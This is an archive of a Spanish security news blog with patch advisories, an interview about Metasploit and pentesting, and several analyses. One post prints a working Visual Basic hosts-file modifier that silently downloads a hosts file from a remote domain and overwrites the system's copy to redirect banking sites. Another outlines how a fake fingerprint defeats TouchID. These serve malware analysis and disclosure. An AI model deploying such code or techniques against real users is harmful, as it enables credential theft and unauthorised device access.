lunes, 30 de septiembre de 2013

Actualización del kernel para Red Hat Enterprise Linux 5

RedHat ha publicado una actualización, considerada de importancia moderada, del kernel de toda la familia Red Hat Enterprise Linux 5. Solventa tres nuevas vulnerabilidades que podrían ser aprovechadas por un atacante para provocar denegaciones de servicio, elevar sus privilegios en el sistema o obtener información sensible.

Los problemas corregidos se deben a un uso de punteros después de liberar en la implementación de la llamada al sistema madvise() (CVE-2012-3511), un fallo en la implementación TCP/IP en el tratamiento de sockets en IPv6 que usen la opción UDP_CORK (CVE-2013-4162) y una fuga de información en el kernel de Linux (CVE-2013-2141).

Además se han solucionado otros fallos de menor importancia. Ésta actualización está disponible desde Red Hat Network.

Más información:

Moderate: kernel security and bug fix update



Antonio Ropero
Twitter: @aropero



domingo, 29 de septiembre de 2013

Lección 6 "Malware: orígenes y evolución" por Sergio de los Santos en el MOOC Crypt4you

Dentro del curso gratuito de Privacidad y Protección de Comunicaciones Digitales que se encuentra en el MOOC Crypt4you, se publica con fecha 24/09/2013 la Lección 6 "Malware: orígenes y evolución" a cargo de Sergio de los Santos, consultor y auditor técnico de seguridad, durante muchos años ligado a diversos proyectos en Hispasec y actualmente liderando el laboratorio técnico de ElevenPaths.

El objetivo de la lección que aporta Sergio de los Santos a este MOOC es ofrecer una visión global y realista del malware contemporáneo, contemplando fundamentalmente las bases de sus técnicas de difusión, infección y robo de datos. Igualmente repasar las diferentes categorías y clasificaciones del malware que se pueden realizar, centrándose en la experiencia real que supone hoy la investigación de la industria del malware, y alejándose de la "literatura clásica" sobre el malware tradicional.

Lección  6. Malware: orígenes y evolución
Apartado 1. Introducción
Apartado 2. Historia
Apartado 3. Tendencias
Apartado 4. Malware para otras plataformas
Apartado 5. Clasificación clásica
Apartado 6. Clasificación por objetivos
Apartado 7. Técnicas de robo de datos

Accesos directos:
Lección  6. Malware: orígenes y evolución

Cursos en MOOC Crypt4you: Privacidad y Protección de Comunicaciones Digitales (actual y activo) y El Algoritmo RSA (terminado 10 lecciones)

Se recuerda que el formato del MOOC Crypt4you es dinámico y, por tanto, el contenido de las lecciones puede experimentar cambios, siendo posible la inclusión de nuevas lecciones o bien la reordenación de las mismas dentro del índice publicado.

La siguiente entrega del MOOC se realizará en el mes de octubre con la Lección 7 "Borrado seguro de información. Recomendaciones", a cargo del experto invitado Pedro Sánchez.


  
Jorge Ramió, Alfonso Muñoz

Editores de Crypt4you

sábado, 28 de septiembre de 2013

Apple corrige dos saltos de restricciones en iOS 7

Después de la publicación de iOS 7 el pasado día 18, Apple se ha apresurado a lanzar una nueva versión (la 7.0.2) que corrige dos nuevas vulnerabilidades.

Ambas están relacionadas con el código de desbloqueo de los dispositivos. La primera de ellas, con CVE-2013-5160 permite que cualquier persona con acceso al dispositivo pueda realizar llamadas sin conocer el código de desbloqueo del mismo. Esto ocurre en iPhone 4 y posteriores debido a un error conocido como puntero de deferencia nula. Estando en la pantalla de llamada de emergencia, se teclea el número al que se desea llamar y posteriormente se pulsa repetidas veces el número de llamada. El dispositivo se reiniciará y llamará al número marcado.

La segunda vulnerabilidad con CVE-2013-5161 también afectaría a los iPhone 4 y posteriores, además de los iPod touch y los iPad 2 y posteriores. Se podría tener acceso a la lista de aplicaciones, a las últimas llamadas realizadas, además de poder acceder a la aplicación de la cámara y ver/editar las fotos realizadas con esta.

La nueva actualización ya está disponible en los dispositivos a través del menú Ajustes -> General -> Actualización software.

Más información:

APPLE-SA-2013-09-26-1




Antonio Sánchez

viernes, 27 de septiembre de 2013

Hispasec publica un parche para dar soporte a la rama 4 de Android en DroidBox

Hasta el momento DroidBox, proyecto para el análisis dinámico de aplicaciones para Android, no funcionaba adecuadamente en la rama 4 de este sistema operativo. Hispasec ha publicado un parche, que ha sido aprobado por el equipo de desarrollo de este proyecto y que permite solucionar este problema.

https://code.google.com/p/droidbox/
DroidBox es un proyecto para el análisis dinámico de aplicaciones para Android. Es usado principalmente para ejecutar malware y observar su comportamiento. Es decir, ejecuta la aplicación en un entorno controlado y aislado (una "sandbox") donde se monitoriza la ejecución de la aplicación proveyendo de datos al analista. Entre estos datos podemos observar la gestión de archivos, conexiones de red, etc.

Nuestro departamento de malware hace uso de dicha herramienta para detectar el comportamiento de este tipo de aplicaciones maliciosas, en especial el malware orientado al fraude bancario, apoyando a nuestro equipo anti-fraude en esta faceta. Además de su uso en la lucha contra el malware bancario, DroidBox es usado en un proyecto, dentro del marco de colaboración europeo, del que os daremos detalles más adelante.

Con DroidBox teníamos un pequeño problema. Solo podíamos ejecutar con eficacia aplicaciones para la rama 2.x de Android, por lo que era cuestión de tiempo que el malware dirigiera sus esfuerzos sobre la rama 4.x. Conscientes de este problema decidimos que debíamos adelantarnos a esta tendencia y hace tiempo nuestro compañero Laurent Delosières recogió el guante.

Laurent estudió el funcionamiento interno de DroidBox y adaptó su arquitectura para que soporte la rama 4 de Android. De este modo ahora DroidBox soporta ambas ramas.

Desde Hispasec decidimos hacer público el parche y comunicarlo a los creadores de DroidBox. Hoy mismo Laurent hizo el commit en el repositorio del proyecto y a partir de ahora nos congratula dar a conocer que DroidBox soporta oficialmente la rama 4 de Android. Entendemos que esto es una buena noticia para todos aquellos profesionales o simplemente gente que le gusta curiosear analizando muestras de malware para Android.

Más información:

DroidBox


Laurent Delosières


David García
Twitter: @dgn1729

jueves, 26 de septiembre de 2013

Actualización de Cisco IOS corrige múltiples vulnerabilidades

Cisco ha publicado su grupo de avisos de seguridad semestral para Cisco IOS. Esta publicación incluye ocho avisos de seguridad que corrigen 10 vulnerabilidades que podrían provocar condiciones de denegación de servicio.

IOS (Internetwork Operating System) es el software estándar utilizado por Cisco en sus routers y switches. Proporciona un sistema operativo a la vez que una interfaz de línea de comandos para la configuración del dispositivo.

Las vulnerabilidades tienen identificadores entre CVE-2013-5472 a CVE-2013-5481 y afectan a diversas versiones del sistema IOS, en especial a las 12 y 15. Los errores residen en la implementación del protocolo NTP (Network Time Protocol), en el protocolo IKE (Internet Key Exchange), en la implementación de la característica VFR (virtual fragmentation reassembly) de IPv6, de DHCP, en el componente Zone-Based Firewall (ZBFW), en la implementación de la cola del controlador T1/E1, en la función RSVP (Resource Reservation Protocol) y tres vulnerabilidades en la implementación de NAT (Network Address Translation).

Dada la diversidad de versiones de IOS vulnerables se recomienda consultar los boletines de Cisco para obtener información sobre versiones afectadas y disponibilidad de actualizaciones.

Recordamos que desde 2008 de acuerdo a su política de distribución de avisos, Cisco publica los avisos de seguridad de Cisco IOS el cuarto miércoles de los meses de marzo y septiembre del año.

Más información:

Cisco IOS Software Multicast Network Time Protocol Denial of Service Vulnerability

Cisco IOS Software Internet Key Exchange Memory Leak Vulnerability

Cisco IOS Software IPv6 Virtual Fragmentation Reassembly Denial of Service Vulnerability

Cisco IOS Software DHCP Denial of Service Vulnerability

Cisco IOS Software Zone-Based Firewall and Content Filtering Vulnerability

Cisco IOS Software Queue Wedge Denial of Service Vulnerability

Cisco IOS Software Resource Reservation Protocol Interface Queue Wedge Vulnerability

Cisco IOS Software Network Address Translation Vulnerabilities



Antonio Ropero
Twitter: @aropero



miércoles, 25 de septiembre de 2013

Un modificador de hosts sencillo evita la detección de los antivirus

Una parte importante de los troyanos realizan acciones de modificación del archivo hosts, son los conocidos como "modificadores de hosts" o como "host modifier". Durante el análisis de un malware de este tipo en nuestro laboratorio, y con gran sorpresa, observamos que no fue detectado por ningún antivirus. Lo hemos analizado para ver su código malicioso y comprender por qué no fue detectado.
  
Dentro del departamento antifraude de Hispasec, una de las acciones que solemos realizar diariamente es el análisis de malware que afecta a los clientes de las entidades bancarias suscriptoras de nuestros servicios antifraude. Estamos acostumbrados a tratar con múltiples muestras, aunque generalmente solemos encontrar versiones de las familias más habituales. Sin embargo, de vez en cuando, encontramos alguna muestra que nos sorprende por no ser detectada por antivirus, aportar alguna técnica novedosa, etc.

El análisis de esta nueva muestra (con hash
ecc58e97f64ca42fe638e499a2ad7f50a3008f30f071cecb71b2c223d7d8d1ac) nos permitió observar que realizaba una modificación del hosts pero no empleaba ningún mecanismo de ofuscacion o poliformismo. Esto nos sorprendió, ya que una acción como la de modificar el archivo hosts debería ser detectado por al menos un buen número de antivirus. Actualmente esta muestra es detectada por 12 de 47 antivirus.

Un "HostModifier" es un modificador del archivo hosts. El archivo hosts contiene la correspondencia entre el nombre de un dominio y su dirección IP. Cuando Windows resuelve la dirección IP, va a consultar primero el archivo host y si el dominio no está dentro, hace una petición al servidor DNS para recoger la dirección IP.

Un atacante puede modificar el archivo hosts para redireccionar los dominios reales a dominios fraudulentos. Este ataque se utiliza para robar datos como, por ejemplo credenciales bancarias. Además, este ataque es más sencillo de realizar para robar datos y credenciales, comparado con otras familias más elaboradas y complejas como Zeus, Citadel, SpyEye, etc.

Para explicar las funcionalidades del "host modifier", hemos creado una versión más sencilla con solo la parte maliciosa. Esperamos que sirva también de ayuda para los analistas de malware y laboratorios antivirus. La lógica del programa es la siguiente: (1) se esconde del usuario, (2) recoge el archivo hosts de un servidor a distancia, (3) re-escribe el actual archivo hosts, y (4) termina su ejecución. Más sencillo imposible.

Código fuente:

Private Sub Form_Load()
    Dim oHTTP As Object
    Dim oADOStream As Object

   ' Ofuscación del programa
   Me.Hide
   
    'Descarga el archivo hosts
    Set oHTTP = CreateObject("Microsoft.XMLHTTP")
   
    oHTTP.Open "GET", "http://bwjdwqh.com/ht.txt", False
    oHTTP.Send

    'Re-escribe el archivo hosts
    Set oADOStream = CreateObject("Adodb.Stream")
    oADOStream.Type = 1
    oADOStream.Mode = 3
    oADOStream.Open
    oADOStream.Write oHTTP.responseBody
    oADOStream.SaveToFile CStr(Environ("WINDIR") & "\\system32\\drivers\\etc\\hosts"), 2
    oADOStream.Close
   
    'Detiene el programa
    End
End Sub

Este código, como prueba de concepto, lo hemos subido a VirusTotal para comprobar los resultados de los análisis de los antivirus. De los 48 antivirus, solo uno, McAfee-GW-Edition, lo ha detectado como sospechoso. Curioso que este mismo antivirus en cambio detecte como malware todos los programas VisualBasic sin línea de programación dentro.

https://www.virustotal.com/es/file/f708a2133b3b9fae65adb7ff152853a2e4ede857d8912567210d9606a5cec8e5/analysis/1379951161/

Queremos subrayar la importancia de mantener actualizado el antivirus, así como prestar atención a las alertas de análisis heurístico de comportamientos maliciosos.

Más informacion:

Hash del programa compilado
SHA256: f708a2133b3b9fae65adb7ff152853a2e4ede857d8912567210d9606a5

Análisis de los antivirus:

Análisis muestra original:


  
Laurent Delosieres

martes, 24 de septiembre de 2013

Actualización del kernel para SuSE Linux Enterprise 11

SuSE han publicado actualizaciones del kernel para SuSE Linux Enterprise Server y Desktop en su versión 11 Service Pack 2 y Service Pack 3, ambas consideradas importantes. Se han corrido 13 vulnerabilidades y 74 correcciones en la versión SP3 y 12 vulnerabilidades y 59 correcciones en la versión SP2, en ambos casos se ha actualizado el kernel a la versión 3.0.93.

11 de los problemas son comunes a ambas actualizaciones y residen en net/ceph/auth_none.c, fs/xfs/xfs_buf.c, drivers/net/ethernet/broadcom/tg3.c, copy_event_to_user(), drivers/cdrom/cdrom.c, net/ipv6/ip6_output.c, net/key/af_key.c, block/genhd.c y a la implementación IPv6 en el kernel de Linux. Los CVE asignados son: CVE-2013-1059, CVE-2013-1819, CVE-2013-1929, CVE-2013-2148, CVE-2013-2164, CVE-2013-2232, CVE-2013-2234, CVE-2013-2237, CVE-2013-2851, CVE-2013-4162, CVE-2013-4163.

Existe un problema exclusivo de SuSE Linux Enterprise 11 Service Pack 2, con CVE-2013-1774, en la función chase_port de drivers/usb/serial/io_ti.c. Propios de Service Pack 3, se referencian CVE-2013-2852 y CVE-2013-3301.

En todos los casos los problemas podrían permitir evitar restricciones de seguridad, obtener información sensible, elevar los privilegios del usuario, realizar ataques de denegación de servicio y otros impactos no especificados.

Se recomienda actualizar a la última versión del kernel, disponible a través de la herramienta automática YaST con el módulo "Online Update" o con la herramienta de línea de comando "zypper".

Más información:

SUSE-SU-2013:1473-1: important: Security update for Linux kernel

SUSE-SU-2013:1474-1: important: Security update for Linux kernel


Antonio Ropero
Twitter: @aropero

lunes, 23 de septiembre de 2013

Cisco publica boletines para Prime Data Center Network Manager y Prime Central for HCS Assurance

Cisco ha publicados dos boletines de seguridad que corrigen vulnerabilidades para sus soluciones de la línea Prime Data Center Network Manager y Central for HCS Assurance. Se cubren en total cinco fallos (cuatro afectan al primer sistema y una al segundo). Cabe destacar la existencia, según Cisco, de exploits funcionales que aprovechan las vulnerabilidades.

En referencia al primer boletín, dedicado a Prime Data Center Network Manager, son cuatro las vulnerabilidades solucionadas, con identificadores CVE-2013-5487, CVE-2013-5490 y CVE-2013-5486 (dos han sido agrupadas en este último). Afectan a las versiones anteriores a la 6.2(1).

Tres de las vulnerabilidades radican en fallos en el servidor SAN de Prime DCNM, y permitirían producir varios impactos. En la primera de ellas, con identificador CVE-2013-5487, podría permitir el acceso a ficheros del sistema, mientras que las dos restantes (CVE-2013-5486) podrían causar la ejecución de comandos remotos en el sistema operativo subyacente en el contexto del usuario SYSTEM (Windows) o root (Linux).

La cuarta vulnerabilidad (CVE-2013-5490) permitiría la lectura de archivos de texto con los permisos del superusuario del sistema. Inyectando entidades externas en ficheros XML, se podrían referenciar ficheros del sistema. Al procesar la petición, los ficheros serían mostrados, dando lugar a la revelación de información.

El segundo boletín trata una vulnerabilidad en Prime Central for HCS Assurance en sus versiones 1.0.1 y 1.1. Se trata de un fallo en el sistema de autenticación y manejo de sesiones de usuario en el entorno web de la aplicación. A través de una petición HTTP manipulada, un atacante podría acceder a información sensible, incluidas las credenciales de usuario. Se le ha asignado el identificador CVE-2013-3473.

Todas las vulnerabilidades son explotables remotamente sin necesidad de autenticación. Además, como hemos comentado, existen exploits funcionales que aprovechan las vulnerabilidades, siendo el caso más acusado el de CVE-2013-5490, cuya explotabilidad Cisco califica como alta. Los boletines incluyen las actualizaciones de software necesarias para solucionar las vulnerabilidades.

Más información:

Multiple Vulnerabilities in Cisco Prime Data Center Network Manager

Cisco Prime Central for Hosted Collaboration Solution Assurance Unauthenticated Username and Password Enumeration Vulnerability




Francisco López

domingo, 22 de septiembre de 2013

El grupo Chaos Computer Club consigue saltar el sistema TouchID del iPhone 5s

El sistema TouchID es una de las novedades del iPhone 5s, dispositivo de Apple que empezó a comercializarse el pasado día 20. Se trata de un sistema de seguridad biométrica que permite al usuario utilizar su huella digital como credencial en operaciones como el bloqueo del terminal o realizar compras en las diferentes tiendas Apple. Apenas dos días después de su lanzamiento ya se ha descubierto una forma de saltar esta protección.

Técnicamente, se trata de un sensor de huellas dactilares con una resolución de 500 ppp montado en el interior del botón de casa del dispositivo. Una vez tomada la huella dactilar, esta se almacena en la zona segura del iPhone ("Secure Enclave") como una representación matemática a partir de la cual, según Apple, no se puede conoce la forma original de la huella. Esta representación no se almacena en ningún otro lugar ni es compartida con ninguna aplicación.

Los investigadores alemanes Chaos Computer Club, especializados en seguridad biométrica, han publicado un vídeo donde muestran como, utilizando una copia de una huella dactilar, se puede saltar la comprobación del TouchID.

Según el articulo publicado junto al vídeo, el procedimiento es sencillo y requiere materiales cotidianos. De hecho, es similar a lo que se viene haciendo hasta ahora para engañar a otros sistemas lectores de huella dactilar.



Basándonos en una fotografía de la huella, que se puede tomar de cualquier medio, se crea una inversión en blanco y negro (donde las líneas de la huella sean blancas y los espacios negros) y se imprime en papel transparente. La impresión se realiza con opciones de densidad alta para el tóner, y se le aplica encima una capa de cola o látex. Los surcos dejados por el tóner sirven de molde para crear la huella dactilar falsa, que se graba en el látex. Una vez seco, contiene una copia de la huella digital que puede ser usada para suplantar la identidad ante TouchID.

Aunque el proceso es lógico, era necesario saber si dadas las características del sistema de Apple era necesario algún procedimiento especial. Según Starbug, miembro de CCC, TouchID no se diferencia de otros sensores dactilares en más que en tener mayor resolución.

"In reality, Apple's sensor has just a higher resolution compared to the sensors so far. So we only needed to ramp up the resolution of our fake."

El hallazgo ha sido impulsado por Is TouchID Hacked Yet, una suerte de híbrido entre financiación colectiva y caza de bugs creado exclusivamente para este fin. En el sitio los usuarios han realizado una aportación a la recompensa que se llevará quien de primero una solución. Actualmente, el monto de la recompensa es de 19.526 dolares (y varias botellas de alcohol). 

http://istouchidhackedyet.com/

Durante años, el grupo CCC ha sido especialmente crítico con la seguridad biométrica, que consideran inadecuada para la autenticación del usuario frente a dispositivos. En palabras de su Portavoz, Frank Rieger:

"We hope that this finally puts to rest the illusions people have about fingerprint biometrics. It is plain stupid to use something that you can´t change and that you leave everywhere every day as a security token. The public should no longer be fooled by the biometrics industry with false security claims".

El descubrimiento se produce dos días después del lanzamiento del terminal, y ya siendo conocidos otros problemas que permiten saltar el bloqueo por PIN en iOS 7, que es el usado en el terminal.

Más información:

Chaos Computer Club breaks Apple TouchID

Is TouchID Hacked Yet



Francisco López

sábado, 21 de septiembre de 2013

iOS 7 corrige 80 vulnerabilidades en los dispositivos móviles de Apple

Como ya es conocido Apple ha publicado esta semana la versión 7 de iOS, el sistema operativo de sus dispositivos móviles (iPhone, iPad e iPod touch). Además del gran número de novedades, cambios, mejoras, etc incluidas en esta nueva versión Apple ha corregido un total de 80 vulnerabilidades de diferente índole.

Las vulnerabilidades corregidas, que alcanzan la cifra de 80, son de diversa índole y afectan a gran número de componentes del sistema operativo que incluyen CoreGraphics, ,CoreMedia, Data Protection, Data Security, dyld, File Systems, ImageIO, IOKit, IOKitUser, IOSerialFamily, IPSec, Kernel, Kext Management, libxml, libxslt, Passcode Lock, Personal Hotspot, Push Notifications, Safari, Sandbox, Social, Springboard, Telephony, Twitter y WebKit. Los problemas podrían permitir acceder al dispositivo y a información sensible sin conocer la contraseña del usuario, ejecutar código arbitrario o realizar otro tipo de ataques sobre el dispositivo.

Con iOS 7 Apple también ha anunciado una actualización de los certificados raíz, se han añadido y eliminado múltiples certificados de la lista de sistemas raíz.

Aunque esta actualización acaba de publicarse apenas hace unos días y muchos usuarios aun no se han actualizado, ya empiezan a aparecer diversas vulnerabilidades que podrían permitir saltar el código de desbloqueo. Apple ya tiene vulnerabilidades para corregir en la próxima versión de iOS.

Más información:

About the security content of iOS 7

Bug en iOS 7.0 permite saltarse el código de desbloqueo


Antonio Ropero
Twitter: @aropero

viernes, 20 de septiembre de 2013

Nuevas versiones de Firefox, Thunderbird y Seamonkey corrigen 17 vulnerabilidades

Mozilla Foundation ha publicado nuevas versiones de sus productos (24 para Firefox y Thunderbird, 2.12 para Seamonkey). En esta ocasión se corrigen 19 fallos de seguridad agrupados en 17 boletines, 7 de los cuales se consideran de importancia crítica. En esta versión se deja de dar soporte a las Listas de Revocación de Certificados.

Entre los siete boletines calificados como de importancia crítica y los cuatro de importancia alta se cubre un total de 13 vulnerabilidades. Todas estas permiten la ejecución de código arbitrario de manera remota como consecuencia de fallos de diversa naturaleza, y algunas permiten además otros impactos.

El resto de boletines tratan vulnerabilidades de carácter moderado, que permiten el acceso a información sensible del sistema, el salto de restricciones de seguridad o la denegación de servicio. La gran mayoría de estos boletines afecta a los tres sistemas actualizados, aunque algunos no son aplicables a Thunderbird y Seamonkey.

Los boletines MFSA-2013-84 y MFSA-2013-87 en particular afectan únicamente a la versión de Firefox para sistemas Android. El primero trata un sistema para evadir la política del mismo origen en ficheros locales, utilizando para ellos el protocolo file:// junto con enlaces simbólicos para conseguir acceso a ficheros del sistema o realizar ataques cross-site scripting (XSS). El segundo permitiría la ejecución de código malicioso o el acceso a los datos del navegador al cargar una librería compartida, pero para ello es necesario la instalación de programas maliciosos y no se puede provocar a través de contenido web.

A partir de esta versión se elimina de la interfaz gráfica el acceso a la gestión de las listas de revocación de certificados (CRL) en Firefox. Esta funcionalidad seguirá siendo usada por el navegador, pero se delega la gestión de las CRL a las librerías NSS, pudiéndose gestionar a través de la herramienta crlutil. Esto forma parte de un movimiento de Mozilla hacia un mecanismo que recoja la información de los certificados revocados directamente de las CA intermedias.
Más información:

Mozilla Foundation Security Advisories



Francisco López

jueves, 19 de septiembre de 2013

Microsoft publica actualización de urgencia para Internet Explorer

Fuera de su ciclo habitual de actualizaciones de los segundos martes de cada mes, Microsoft acaba de publicar un boletín de seguridad para informar de una grave vulnerabilidad que se está explotando de forma activa y afecta a su navegador Internet Explorer y que puede permitir la ejecución remota de código arbitrario. 

Aunque según Microsoft solo hay informes de que se esté explotando directamente sobre las versiones 8 y 9 del navegador, el problema afecta a todas las versiones de Internet Explorer, desde la 6 a la 11. Las únicas plataformas Windows libres del problema son los sistemas servidor, que incluyen IE en modo restringido por defecto. Si se ha desactivado el modo restringido también puede ser vulnerable.

El problema, con CVE-2013-3893, podría permitir la ejecución remota de código si un usuario accede a una web específicamente creada. La vulnerabilidad reside en el acceso por Internet Explorer a objetos en memoria que han sido eliminados o incorrectamente asignados por el motor de representación HTML (mshtml.dll) de IE. El exploit detectado por Microsoft está implementado totalmente en Javascript (no depende de Java, Flash, etc.) pero sí depende de una DLL de Office que no fue compilada con ASLR habilitado (Address Space Layout Randomization). El propósito de esta dll en el contexto del exploit es evitar ASLR mediante código ejecutable en una dirección en memoria conocida.

Microsoft ha publicado un parche temporal, como "Fix it" "CVE-2013-3893 MSHTML Shim Workaround" si bien esta solución solo sirve para versiones 32-bit del navegador.
Este parche no pretende ser un sustituto de la actualización de seguridad, que seguramente se publicará posteriormente a través de un boletín en el ciclo habitual de actualizaciones.

Para usuarios avanzados y administradores de sistemas también se recomienda el uso de EMET (Enhanced Mitigation Experience Toolkit o kit de herramientas de experiencia de mitigación mejorada) para mitigar la explotación de la vulnerabilidad mediante la inclusión de capas de protección adicionales. EMET 3.0 y EMET 4.0 tienen soporte oficial de Microsoft. EMET es un programa de Microsoft gratuito, (solo disponible en lenguaje ingles) sencillo de manejar y de gran utilidad. En el aviso de seguridad de Microsoft se explican detalladamente los pasos para su adecuada configuración.
http://technet.microsoft.com/en-us/security/advisory/2887505

Más información:

Microsoft Security Advisory (2887505)
Vulnerability in Internet Explorer Could Allow Remote Code Execution

CVE-2013-3893: Fix it workaround available

Microsoft Security Advisory: Vulnerability in Internet Explorer could allow remote code execution


Antonio Ropero
Twitter: @aropero


miércoles, 18 de septiembre de 2013

Entrevista a Carlos Pérez. "Metasploit ha cambiado la industria y lo seguirá haciendo"

Hispasec ha tenido el placer de entrevistar a Carlos Pérez (@carlos_perez). Carlos Pérez ha trabajado como consultor en las áreas de seguridad, redes y virtualización para Compaq, HP o Microsoft en las regiones de América Central, Caribe y Puerto Rico. Es un activo contribuidor del proyecto Metasploit con múltiples scripts incluidos en el proyecto. Es conocido como miembro del podcast PaulDotCom (http://www.pauldotcom.com) donde también ha coordinado la versión española del mismo (PaulDotCom en español). Especialista en escribir código en Python, Ruby, Powershell, T-SQL y Bash, muchos de sus scripts y herramientas pueden encontrarse en http://www.darkoperator.com. Posee múltiples certificaciones como MCSE, MCDBA, CCDA, Security +, A+, Linux + o Network+ .

Pregunta: Postexplotación, Metasploit, Nessus, Powershell, dnsrecon... Eres una persona difícil de encasillar a la vista a la cantidad de temas que tocas y en los que aportas herramientas y conocimiento, sin embargo ¿Hay algún área que te gustaría explorar a fondo que aún no hayas tratado?

Respuesta: Ese es el propósito, el mundo no es solo Windows, Linux, Unix, Cisco o cualquier otra plataforma. Igual que no solo hay sistemas operativos, sino que también hay almacenamiento, redes, bases de datos y sistemas que operan sobre ellas. Siempre estoy leyendo y aprendiendo de todo, mi experiencia viene de haber trabajado muchos años, no solo en seguridad, también en diseño de CPDs y soluciones para estos. He tenido muchas reuniones con hombres de negocios viendo como plasmar sus necesidades en soluciones técnicamente seguras. Te seré sincero, la seguridad en general es el área que más estudio en profundidad, pero siempre estoy aprendiendo de diseño, programación e infraestructuras. Porque el saber solo de algo sin tener la imagen completa hace lo que yo llamo "One trick ponny", es como un pentester que no sepa de programación y de administración de sistemas, ¿cómo podría hacer recomendaciones si el mismo no conoce como funciona? solo sabe trucos de como meterse en los mismos.

P: Los fabricantes de software emplean más y mejores medidas antiexplotación, dirigidas a contener o reducir el impacto de las vulnerabilidades. ¿Cómo ves el futuro del pentester en un escenario donde la explotación podría parecer cosa del pasado? ¿Crees que nos estamos acercamos a este escenario?

R: Se verá reducida la explotación remota de "buffer overflow" y "memory corruption" de servicios remotos a los que nos conectamos. Los fallos en aplicaciones tipo web y del lado de cliente son cada vez más complejos y esa complejidad siempre traerá problemas; por lo cual veo una reducción según se aprende, pero no desaparecerán. También siempre estará el problema del factor humano donde veremos malas configuraciones e implementación de controles.

P: Comentabas en "PaulDotCom en Español" que tenías diferencias con la política de publicación de módulos en Metasploit cuando el fabricante aún no había publicado parche alguno. ¿Hay debate interno entre los desarrolladores de Metasploit en ese sentido? ¿Qué razonamiento justifica la publicación de dichos módulos en las circunstancias comentadas?

R: El debate que sepa no ocurre, Metasploit hoy en día es un producto de Rapid7, cuyas normas y evolución se dictan más por la compañía que por los desarrolladores que contribuyen su código al Framework. El Framework es solo una base para el producto comercial, ya que el instalador lo que te instala es la demo de los mismos no una versión completamente libre. No veo que ofrezca valor el poner una vulnerabilidad de manera "Weaponized" libre si el fabricante ya se comprometió a parchearlo en su próximo ciclo o semanas, y solo un número pequeño de personas lo está usando. Hacerlo público lo abre a que cualquier "Script Kiddy" pueda abusar del mismo, ya que no hay protección. Se dice que es para que la gente configure sus IPS o que investigue una mitigación, pero ¿Cuántos realmente lo hacen o lo tienen en forma de bloqueo? por lo que he visto creo que bien pocos, por lo cual lo veo como puro mercadeo.

Sí veo que hay momentos en los cuales sirve para presionar para que se solucione cuando el desarrollador ignora o simplemente no le importa, al igual que veo que sirve para los auditores de sistemas en sus pruebas para demostrar riesgo cuando el exploit es abusado por varios medios externos. Pero cuando el exploit no es público ni abusado en ese caso no le veo el valor a hacerlo completamente público a cualquier persona externa. Todo es como se hace, en algunos casos estoy en desacuerdo en otros no, pero como mencioné la comunidad no tiene voto ni voz sobre como ellos lo trabajan. Ahora no lo tomes como que no quiero el proyecto, Metasploit ha cambiado la industria y lo seguirá haciendo. El cambio al modelo comercial ha mejorado la calidad de código considerablemente, estoy contento de que a muchos de los desarrolladores ahora se les pague para escribir todo el día en el proyecto que aman y quieren, tengo el mayor respeto por todos ellos. El cambio ha sido para bien y el que quiera contribuir puede seguir haciéndolo, por eso es que creé el script de instalación y sigo escribiendo módulos para amistades y bajo contrato. Es una de las mejores herramientas y siempre me verás trabajando en la base de código abierto de ella, con mis propios plugins, módulos y enviando arreglos al código según el tiempo y motivación me permitan.

P: ¿Tienes que hacer un pentest y solo puedes emplear tres herramientas? ¿Cuáles serían?

R: Eso está difícil. Dependiendo del cliente, plataforma y lo que tenga, diría que mi cerebro, cualquier lenguaje moderno y como sistema operativo Linux, ya que me brinda la mayor flexibilidad en utilidades dentro del mismo que puedo usar y unir usando bash, python o ruby.

P: Fuiste militar ¿En que sentido ha marcado esa etapa de tu vida tu labor actual como profesional de la seguridad lógica?

R: Bueno firmé para ello pero no logré graduarme por problemas de vista, después me buscaron para volver tras una cirugía que me corrigió el problema, pero mi esposa me amenazó con el divorcio si lo hacía. He practicado artes marciales, y durante mucho tiempo he estudiado las ciencias de combate, hasta he sido instructor de combate cercano con arma corta. Todo eso me ha enseñado a simplificar y no sobrecomplicar las cosas. También me ha llevado a una noción de entrenar constantemente, evaluar, descartar lo que no sirve según pasa el tiempo y reinventar procesos y técnicas según evoluciona el ambiente.

Otra área es que puedo entrenar en el polígono disparando todo el día, en el gimnasio golpeando el saco o en el laboratorio corriendo módulos y scripts, pero si no entrenas contra otra persona no verás tus fallos y áreas de mejoras, sea en fogueo con munición simulada contra contrincantes o que un amigo configure una red y trates de penetrarla, solo estás en el principio del proceso de aprendizaje.

P:¿Tienes alguna anécdota o momento especial que recuerdes durante tu trabajo de pentesting?

R: Te seré sincero, no recuerdo nada que brille o sobresalga. Siempre me ha sorprendido algo que pasa una vez o dos al año, que es el ser llamado para hacer un pentest, no gano la adjudicación y después me llaman para evaluar el trabajo del que ganó, y encontrar que la mayoría de los pentesters que veo no saben lo básico como en tiempos anteriores. No saben de redes, de sistemas operativos, de como trabajan las cosas, solo saben correr herramientas que otros han escrito y no saben ni como el cliente genera dinero y maneja su negocio para entender sus necesidades, de manera que puedan adaptar su reporte de recomendaciones a las realidades del mismo. Te diría que lo que más me llena ahora es enseñar a otros a no ser como esos. El dar clases o escribir sobre la base me ha llenado de mucha alegría y buenos momentos más que el ejecutar los pentest.

P: Powershell, Windows 8... ¿Que puedes contarnos de ese interés en Windows? ¿Se trata de algo en lo que estás trabajando (aparte de Posh-SecMod) o simplemente es un "cambio de aires"?

R: En realidad vengo del mundo MS y nunca lo he dejado. Te contaré algo personal que muy pocos lo saben, yo al nacer tuve problemas de oxígeno y sufrí daños por ello. No aprendo ni retengo información como todo el mundo por lo cual tengo que trabajar un poco más duro que el resto. Mi gran ventaja es que mi madre nunca aceptó eso e ignoró lo que los médicos y psicólogos decían y me enseñó una lección bien importante de la vida: que es no rendirse y trabajar duro para avanzar en la vida. También mi madre ha sido cocinera, vendedora, diseñadora de interiores, empresaria, creó su propia línea de ropa y es artista (ahora mismo mi casa esta decorada con sus cuadros). En pocas palabras, me enseño que en esta vida hay que evolucionar y cambiar según el tiempo pasa. En mi trabajo día a día trabajo con Cisco, Juniper, servidores, unidades de almacenamiento de fibra, iSCSI, NFS, CIFS, con Windows, Linux, HPUX, Solaris y otras cosas más.

Nunca me ha gustado la idea de ser lo que llaman "One Trick Ponny". Durante mucho tiempo le dediqué todo el tiempo a Metasploit; antes de eso fue defensa e infraestructura, consolidando y asegurando centros de cómputo; ahora trabajo más en defensa. Como verás, por todo ello toco un poco de todo y me ves semanas leyendo de un área y después me puedes ver el siguiente mes leyendo y aprendiendo de otra, pero siempre practicando los fundamentos de redes y administración.

